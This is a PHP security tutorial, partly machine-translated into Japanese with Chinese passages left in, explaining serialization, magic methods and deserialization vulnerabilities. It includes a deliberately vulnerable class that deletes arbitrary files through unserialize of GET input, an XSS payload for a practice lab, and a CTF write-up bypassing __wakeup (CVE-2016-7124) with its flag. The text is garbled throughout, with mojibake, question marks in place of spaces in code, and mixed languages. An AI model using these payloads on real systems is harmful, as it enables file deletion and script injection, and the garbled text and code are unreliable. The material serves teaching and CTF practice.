この記事は、PHP に関する関連知識を提供します。主に、PHP オブジェクト指向プログラミング、シリアル化と逆シリアル化、逆シリアル化の脆弱性の原則、その他の內(nèi)容を含む、逆シリアル化の脆弱性に関する関連問題を紹介します。みんなの役に立つでしょう。

##推奨學(xué)習(xí): 「

PHP ビデオ チュートリアル 」

1. PHP オブジェクト指向プログラミング

在

オブジェクト指向プログラミング (オブジェクト指向プログラミング、OOP)、

オブジェクトは、情報とその情報の処理の記述によって表現(xiàn)される全體です。構(gòu)図は現(xiàn)実世界を抽象化したものです。

クラス

は、同じ構(gòu)造と動作を共有するオブジェクト のコレクションです。各クラスの定義はキーワード class で始まり、その後にクラス名が続きます。 PHP クラスを作成します:

<?php
class TestClass //定義一個類
{
//一個變量
public $variable = &#39;This is a string&#39;;
//一個方法
public function PrintVariable()
{
echo $this->variable;
}
}
//創(chuàng)建一個對象
$object?=?new?TestClass();
//調(diào)用一個方法
$object->PrintVariable();
?>

public、protected、private

PHP

屬性またはメソッドのアクセス制御

は、先頭に # を追加することによって行われます ##キーワード

パブリック (public)、プロテクト (protected)、またはプライベート (private) を?qū)g現(xiàn)します。 public (public): パブリック クラス メンバーには、どこからでも アクセスできます。

protected (保護(hù)された): 保護(hù)されたクラス メンバーは、それ自體、そのサブクラス、親クラスから アクセスできます。

private (プライベート): プライベート クラス メンバー

には、それが定義されているクラスからのみ アクセスできます。

注:

アクセス制御修飾子が異なると、以下に示すように、シリアル化後の屬性の長さと屬性値が異なります。 public: 屬性はシリアル化されます。屬性値がシリアル化されると、屬性値は

屬性名

になります: 屬性がシリアル化されると、屬性値は

\x00*\x00屬性名##になります

#private: 屬性がシリアル化されると、屬性値は \x00 クラス名\x00 屬性名

になります。ここで: \x00

は空文字 を意味しますが、次の例のように 1 文字位置 (スペース) を占有します。

<?phpclass People{
    public $id;
    protected $gender;
    private $age;
    public function __construct(){
        $this->id?=?'Hardworking666';
????????$this->gender?=?'male';
????????$this->age?=?'18';
????}}$a?=?new?People();echo?serialize($a);?>

O:6:"People":3:{s:2:"id";s:14:"Hardworking666";s:9:"?*?gender";s:4:"male";s:11:"?People?age";s:2:"18";}

マジック メソッド (マジック関數(shù))

# で 2 つのアンダースコアを配置します。 ## PHPでは #で始まるメソッドを

マジックメソッド

(マジックメソッド)といいます

PHP公式——マジックメソッド16の詳しい説明PHP のマジック メソッド クラスにはいくつかの特別な関數(shù)が含まれる場合があります。マジック関數(shù)は、特定の狀況下で を自動的に呼び出します。

__construct()????????????//類的構(gòu)造函數(shù)，創(chuàng)建對象時觸發(fā)

__destruct()?????????????//類的析構(gòu)函數(shù)，對象被銷毀時觸發(fā)

__call()?????????????????//在對象上下文中調(diào)用不可訪問的方法時觸發(fā)

__callStatic()???????????//在靜態(tài)上下文中調(diào)用不可訪問的方法時觸發(fā)

__get()??????????????????//讀取不可訪問屬性的值時，這里的不可訪問包含私有屬性或未定義

__set()??????????????????//在給不可訪問屬性賦值時觸發(fā)

__isset()????????????????//當(dāng)對不可訪問屬性調(diào)用?isset()?或?empty()?時觸發(fā)

__unset()????????????????//在不可訪問的屬性上使用unset()時觸發(fā)

__invoke()???????????????//當(dāng)嘗試以調(diào)用函數(shù)的方式調(diào)用一個對象時觸發(fā)

__sleep()????????????????//執(zhí)行serialize()時，先會調(diào)用這個方法

__wakeup()???????????????//執(zhí)行unserialize()時，先會調(diào)用這個方法

__toString()?????????????//當(dāng)反序列化后的對象被輸出在模板中的時候（轉(zhuǎn)換成字符串的時候）自動調(diào)用

serialize() 関數(shù)は、クラスにマジック メソッドが存在するかどうかを確認(rèn)します。存在する場合、このメソッドが最初に呼び出され、次にシリアル化操作が実行されます。

5 つのマジック メソッドに注目する必要があるので、もう一度強調(diào)します。

__construct: オブジェクト の作成時に呼び出されるコンストラクター

__destruct

: オブジェクト

が破棄されるときに呼び出されるデストラクター __toString

: オブジェクト

が使用されるとき文字列として扱われる場合 __sleep

: オブジェクト

がシリアル化されると __wakeup# が呼び出されます ##: オブジェクト再び起動します。つまり、

はバイナリ文字列からオブジェクト

に再構(gòu)築されます (オブジェクトが デシリアライズされる ときに呼び出されます) シリアル化から これらの関數(shù)の実行プロセス逆シリアル化するのは次のとおりです:

__construct() ->__sleep() -> __wakeup() ->

__toString ()

->

__destruct()

<pre class="brush:php;toolbar:false">&lt;?php class TestClass { //一個變量 public $variable = &amp;#39;This is a string&amp;#39;; //一個方法 public function PrintVariable() { echo $this-&gt;variable.'&lt;br /&gt;'; ????} ????//構(gòu)造函數(shù) ????public?function??__construct() ????{ ????????echo?'__construct&lt;br /&gt;'; ????} ????//析構(gòu)函數(shù) ????public?function?__destruct() ????{ ????????echo?'__destruct&lt;br /&gt;'; ????} ????//當(dāng)對象被當(dāng)作一個字符串 ????public?function?__toString() ????{ ????????return?'__toString&lt;br /&gt;'; ????} } //創(chuàng)建一個對象 //__construct會被調(diào)用 $object?=?new?TestClass(); //創(chuàng)建一個方法 //‘This?is?a?string’將會被輸出 $object-&gt;PrintVariable(); //對象被當(dāng)作一個字符串 //toString會被調(diào)用 echo?$object; //php腳本要結(jié)束時，__destruct會被調(diào)用 ?&gt;</pre>出力結(jié)果: <pre class="brush:php;toolbar:false">__construct This?is?a?string __toString __destruct</pre>__toString()要素が多すぎるため、このマジック メソッドをトリガーするため、それらをリストする必要があります: <pre class="brush:php;toolbar:false">1.??echo($obj)/print($obj)打印時會觸發(fā)? 2.??反序列化對象與字符串連接時? 3.??反序列化對象參與格式化字符串時? 4.??反序列化對象與字符串進(jìn)行==比較時（PHP進(jìn)行==比較的時候會轉(zhuǎn)換參數(shù)類型）? 5.??反序列化對象參與格式化SQL語句，綁定參數(shù)時? 6.??反序列化對象在經(jīng)過php字符串處理函數(shù)，如strlen()、strops()、strcmp()、addslashes()等? 7.??在in_array()方法中，第一個參數(shù)時反序列化對象，第二個參數(shù)的數(shù)組中有__toString()返回的字符串的時候__toString()會被調(diào)用? 8.??反序列化的對象作為class_exists()的參數(shù)的時候</pre>逆シリアル化攻撃におけるマジック メソッドの役割逆シリアル化への入り口は

unserialize()

です。

パラメータが制御可能であり、このクラスが現(xiàn)在のスコープ內(nèi)に存在する限り、

関數(shù)クラスの unserialize()Object に限定されるのではなく、任意のシリアル化されたオブジェクトを渡すことができます。

現(xiàn)在のクラスにのみ制限できる場合、攻撃対象領(lǐng)域が小さすぎるため、他のクラスのオブジェクトを逆シリアル化しても屬性を制御することしかできません。他のクラス オブジェクトのメソッドが逆シリアル化されたコードで呼び出されない場合、 、依然として脆弱性を悪用して攻撃することはできません。

ただし、マジック メソッドを使用すると、攻撃対象領(lǐng)域を拡大できます。マジック メソッドは、クラスのシリアル化または逆シリアル化中に自動的に完了するため、逆シリアル化でオブジェクトのプロパティを使用して操作できます。攻撃目的を達(dá)成するための悪用可能な機能。 次の例を通じて、逆シリアル化の脆弱性におけるマジック メソッドの役割を理解します。コードは次のとおりです: 2. PHP のシリアル化と逆シリアル化

PHP のシリアル化

ネットワーク経由でオブジェクトを送信する必要がある場合があります。送信を容易にするために、 オブジェクト全體をバイナリ文字列 に変換し、データが到達(dá)したときに元のオブジェクトに復(fù)元します。このプロセスは

Serialization

(

Serialization

とも呼ばれます) と呼ばれます。

json數(shù)據(jù)使用 , 分隔開，數(shù)據(jù)內(nèi)使用 : 分隔鍵和值

json數(shù)據(jù)其實就是個數(shù)組，這樣做的目的也是為了方便在前后端傳輸數(shù)據(jù)，后端接受到j(luò)son數(shù)據(jù)，可以通過json_decode()得到原數(shù)據(jù)，
這種將原本的數(shù)據(jù)通過某種手段進(jìn)行"壓縮"，并且按照一定的格式存儲的過程就可以稱之為序列化。

有兩種情況必須把對象序列化：
把一個對象在網(wǎng)絡(luò)中傳輸
把對象寫入文件或數(shù)據(jù)庫

相關(guān)概念可以參考我以前的文章：
Python序列化與反序列化詳解（包括json和json模塊詳解）

PHP序列化：把對象轉(zhuǎn)化為二進(jìn)制的字符串，使用serialize()函數(shù)
PHP反序列化：把對象轉(zhuǎn)化的二進(jìn)制字符串再轉(zhuǎn)化為對象，使用unserialize()函數(shù)

通過例子來看PHP序列化后的格式：

<?php
class User
{
    //類的數(shù)據(jù)
    public $age = 0;
    public $name = &#39;&#39;;
    //輸出數(shù)據(jù)
    public function printdata()
    {
        echo &#39;User &#39;.$this->name.'?is?'.$this->age.'?years?old.<br />';
????}?//?“.”表示字符串連接
}
//創(chuàng)建一個對象
$usr?=?new?User();
//設(shè)置數(shù)據(jù)
$usr->age?=?18;
$usr->name?=?'Hardworking666';
//輸出數(shù)據(jù)
$usr->printdata();
//輸出序列化后的數(shù)據(jù)
echo?serialize($usr)
?>

輸出結(jié)果：

User?Hardworking666?is?18?years?old.
O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";}

下面的 O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";} 就是對象user序列化后的形式。

“O”表示對象，“4”表示對象名長度為4，“User”為對象名，“2”表示有2個參數(shù)。

“{}”里面是參數(shù)的key和value，

“s”表示string對象，“3”表示長度，“age”則為key；“i”是interger（整數(shù)）對象，“18”是value，后面同理。

序列化格式：

a?-?array?數(shù)組型
b?-?boolean?布爾型
d?-?double?浮點型
i?-?integer?整數(shù)型
o?-?common?object?共同對象
r?-?objec?reference?對象引用
s?-?non-escaped?binary?string?非轉(zhuǎn)義的二進(jìn)制字符串
S?-?escaped?binary?string?轉(zhuǎn)義的二進(jìn)制字符串
C?-?custom?object?自定義對象
O?-?class?對象
N?-?null?空
R?-?pointer?reference?指針引用
U?-?unicode?string?Unicode?編碼的字符串

PHP序列化需注意以下幾點：

1、序列化只序列屬性，不序列方法
2、因為序列化不序列方法，所以反序列化之后如果想正常使用這個對象的話我們必須要依托這個類要在當(dāng)前作用域存在的條件
3、我們能控制的只有類的屬性，攻擊就是尋找合適能被控制的屬性，利用作用域本身存在的方法，基于屬性發(fā)動攻擊

PHP反序列化

對上例進(jìn)行反序列化：

<?php
class User
{
    //類的數(shù)據(jù)
    public $age = 0;
    public $name = &#39;&#39;;
    //輸出數(shù)據(jù)
    public function printdata()
    {
        echo &#39;User &#39;.$this->name.'?is?'.$this->age.'?years?old.<br />';
????}
}
//重建對象
$usr?=?unserialize('O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";}');
//輸出數(shù)據(jù)
$usr->printdata();
?>

User?Hardworking666?is?18?years?old.

_sleep 方法在一個對象被序列化時調(diào)用，_wakeup方法在一個對象被反序列化時調(diào)用

<?phpclass test{
    public $variable = &#39;變量反序列化后都要銷毀&#39;; //公共變量
    public $variable2 = &#39;OTHER&#39;;
    public function printvariable()
    {
        echo $this->variable.'<br />';
????}
????public?function?__construct()
????{
????????echo?'__construct'.'<br />';
????}
????public?function?__destruct()
????{
????????echo?'__destruct'.'<br />';
????}
????public?function?__wakeup()
????{
????????echo?'__wakeup'.'<br />';
????}
????public?function?__sleep()
????{
????????echo?'__sleep'.'<br />';
????????return?array('variable','variable2');
????}}//創(chuàng)建一個對象，回調(diào)用__construct$object?=?new?test();
????//序列化一個對象，會調(diào)用__sleep$serialized?=?serialize($object);
????//輸出序列化后的字符串print?'Serialized:'.$serialized.'<br />';
????//重建對象，會調(diào)用__wakeup$object2?=?unserialize($serialized);
????//調(diào)用printvariable,會輸出數(shù)據(jù)(變量反序列化后都要銷毀)$object2->printvariable();
????//腳本結(jié)束，會調(diào)用__destruct?>

__construct
__sleep
Serialized:O:4:"test":2:{s:8:"variable";s:33:"變量反序列化后都要銷毀";s:9:"variable2";s:5:"OTHER";}__wakeup
變量反序列化后都要銷毀
__destruct
__destruct

從序列化到反序列化這幾個函數(shù)的執(zhí)行過程是：
__construct() ->__sleep -> __wakeup() -> __toString() -> __destruct()

PHP為何要序列化和反序列化

PHP的序列化與反序列化其實是為了解決一個問題：PHP對象傳遞問題

PHP對象是存放在內(nèi)存的堆空間段上的，PHP文件在執(zhí)行結(jié)束的時候會將對象銷毀。

如果剛好要用到銷毀的對象，難道還要再寫一遍代碼？所以為了解決這個問題就有了PHP的序列化和反序列化

從上文可以發(fā)現(xiàn)，我們可以把一個實例化的對象長久的存儲在計算機磁盤上，需要調(diào)用的時候只需反序列化出來即可使用。

三、PHP反序列化漏洞原理

序列化和反序列化本身沒有問題，

但是反序列化內(nèi)容用戶可控，

且后臺不正當(dāng)?shù)氖褂昧薖HP中的魔法函數(shù)，就會導(dǎo)致安全問題。

當(dāng)傳給unserialize()的參數(shù)可控時，可以通過傳入一個精心構(gòu)造的序列化字符串，從而控制對象內(nèi)部的變量甚至是函數(shù)。

調(diào)用__destruct刪除

存在漏洞的思路：一個類用于臨時將日志儲存進(jìn)某個文件，當(dāng)__destruct被調(diào)用時，日志文件將會被刪除：

//logdata.php<?phpclass?logfile{
????//log文件名
????public?$filename?=?'error.log';
????//一些用于儲存日志的代碼
????public?function?logdata($text)
????{
????????echo?'log?data:'.$text.'<br />';
????????file_put_contents($this->filename,$text,FILE_APPEND);
????}
????//destrcuctor?刪除日志文件
????public?function?__destruct()
????{
????????echo?'__destruct?deletes?'.$this->filename.'file.<br />';
????????unlink(dirname(__FILE__).'/'.$this->filename);
????}}?>

調(diào)用這個類：

<?phpinclude &#39;logdata.php&#39;class User{
    //類數(shù)據(jù)
    public $age = 0;
    public $name = &#39;&#39;;
    //輸出數(shù)據(jù)
    public function printdata()
    {
        echo &#39;User &#39;.$this->name.'?is'.$this->age.'?years?old.<br />';
????}}//重建數(shù)據(jù)$usr?=?unserialize($_GET['usr_serialized']);?>

代碼$usr = unserialize($_GET['usr_serialized']);中的$_GET[‘usr_serialized’]是可控的，那么可以構(gòu)造輸入，刪除任意文件。

如構(gòu)造輸入刪除目錄下的index.php文件：

<?php
include &#39;logdata.php&#39;;
$object = new logfile();
$object->filename?=?'index.php';
echo?serialize($object).'<br />';
?>

上面展示了由于輸入可控造成的__destruct函數(shù)刪除任意文件，其實問題也可能存在于__wakeup、__sleep、__toString等其他magic函數(shù)。

比如，某用戶類定義了一個__toString，為了讓應(yīng)用程序能夠?qū)㈩愖鳛橐粋€字符串輸出（echo $object），而且其他類也可能定義了一個類允許__toString讀取某個文件。

XSS（跨站腳本攻擊）攻擊

XSS攻擊通常指的是通過利用網(wǎng)頁開發(fā)時留下的漏洞，通過巧妙的方法注入惡意指令代碼到網(wǎng)頁，使用戶加載并執(zhí)行攻擊者惡意制造的網(wǎng)頁程序。攻擊成功后，攻擊者可能得到包括但不限于更高的權(quán)限（如執(zhí)行一些操作）、私密網(wǎng)頁內(nèi)容、會話和cookie等各種內(nèi)容。

例如，皮卡丘靶場PHP反序列化漏洞

$html=";
if(isset($_POST['o'])){????$s?=?$_POST['o'];
????if(!@$unser?=?unserialize($s)){????????$html.="<p>錯誤輸出</p>";
????}else{????????$html.="<p>{$unser->test)</p>";
????}

為了執(zhí)行<script>alert('xss')</script>，Payload:

O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

其他知識點：

unserialize漏洞依賴條件：
1、unserialize函數(shù)的參數(shù)可控
2、腳本中存在一個構(gòu)造函數(shù)（__construct()）、析構(gòu)函數(shù)（__destruct()）、__wakeup()函數(shù)中有向PHP文件中寫數(shù)據(jù)的操作類
3、所寫的內(nèi)容需要有對象中的成員變量的值

防范方法：
1、嚴(yán)格控制unserialize函數(shù)的參數(shù)，堅持用戶所輸入的信息都是不可靠的原則
2、對于unserialize后的變量內(nèi)容進(jìn)行檢查，以確定內(nèi)容沒有被污染

四、實例

PHP反序列化繞過__wakeup() CTF例題

攻防世界xctf web unserialize3

打開網(wǎng)址后的代碼：

class?xctf{public?$flag?=?'111';public?function?__wakeup(){exit('bad?requests');}?code=

已知在使用 unserialize() 反序列化時會先調(diào)用 __wakeup()函數(shù)，

而本題的關(guān)鍵就是如何 繞過 __wakeup()函數(shù)，就是 在反序列化的時候不調(diào)用它

當(dāng) 序列化的字符串中的 屬性值 個數(shù) 大于 屬性個數(shù) 就會導(dǎo)致反序列化異常，從而繞過 __wakeup()

代碼中的__wakeup()方法如果使用就是和unserialize()反序列化函數(shù)結(jié)合使用的
這里沒有特別對哪個字符串序列化，所以把xctf類實例化后，進(jìn)行反序列化。

我們利用php中的new運算符，實例化類xctf。

new 是申請空間的操作符，一般用于類。
比如定義了一個 class a{public i=0;}
$c = new a(); 相當(dāng)于定義了一個基于a類的對象，這時候 $c->i 就是0

構(gòu)造序列化的代碼在編輯器內(nèi)執(zhí)行：

<?php
class xctf{
public $flag = &#39;111&#39;; //public定義flag變量公開可見
public function __wakeup(){
exit(&#39;bad requests&#39;);
}
}//題目少了一個}，這里補上
$a=new xctf();
echo(serialize($a));
?>

運行結(jié)果

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

序列化返回的字符串格式：

O:<length>:"<class name>":<n>:{<field name 1><field value 1>...<field name n><field value n>}

O:表示序列化的是對象
<length>:表示序列化的類名稱長度
<class name>：表示序列化的類的名稱
<n>:表示被序列化的對象的屬性個數(shù)
<field name 1>：屬性名
<field value 1>：屬性值

所以要修改屬性值<n>，既把1改為2以上。

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

在url中輸入：

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

得到flag：cyberpeace{d0e4287c414858ea80e166dbdb75519e}

漏洞：
__wakeup繞過(CVE-2016-7124)
CVE-2016-7124：當(dāng)序列化字符串中表示對象屬性個數(shù)的值大于真實的屬性個數(shù)時會跳過__wakeup的執(zhí)行

官方給出的影響版本：
PHP5 < 5.6.25
PHP7 < 7.0.10

推薦學(xué)習(xí)：《PHP教程》

以上がPHP デシリアライゼーションの脆弱性の詳細(xì)な分析の詳細(xì)內(nèi)容です。詳細(xì)については、PHP 中國語 Web サイトの他の関連記事を參照してください。